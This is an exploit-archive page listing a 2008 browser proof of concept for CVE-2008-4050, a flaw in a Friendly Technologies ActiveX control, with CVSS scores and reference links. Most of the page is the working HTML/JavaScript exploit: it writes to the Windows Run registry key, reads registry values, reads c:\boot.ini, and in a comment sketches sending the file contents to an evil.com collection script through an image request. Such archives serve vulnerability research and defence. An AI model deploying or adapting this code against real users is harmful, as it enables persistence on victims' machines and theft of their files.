Bug: Friendly Technologies Read/Write Registry/Read Files Exploit ( Ascii Version )

Search:
WLB2

Friendly Technologies Read/Write Registry/Read Files Exploit

Published
Credit
Risk
2008.09.15
spdr
High
CWE
CVE
Local
Remote
CWE-20
CVE-2008-4050
No
No

CVSS Base Score
Impact Subscore
Exploitability Subscore
9.3/10
10/10
8.6/10
Exploit range
Attack complexity
Authentication
Remote
Medium
No required
Confidentiality impact
Integrity impact
Availability impact
Complete
Complete
Complete

<!--
Proof of Concept...
Read write to registry
and also read files

More codes at irc.nix.co.il/#binaryvision !
-->

<html>
<title>Friendly Technologies - Read/Write Registry</title>
<object classid="clsid:F4A06697-C0E7-4BB6-8C3B-E01016A4408B" id='FT'></object>

<script language='Javascript'>
// Write to Registry
FT.RegistryValue (1, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", "Key Name Here", 1) =
"Input Here";

// Read from Registry
var readreg = FT.RegistryValue (1, "SOFTWARE\\Friendly Technologies\\FriendlyWeb Dialer", "Version",
1);
alert(readreg);

// Read from file
var readme=FT.GetTextFile("c:\\boot.ini");
alert(readme); // <img src="http://evil.com/postfiles.php?input="+readme ...
</script>

References:

http://www.securityfocus.com/bid/30940
http://www.securityfocus.com/bid/30939
http://www.milw0rm.com/exploits/6334
http://secunia.com/advisories/31644

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version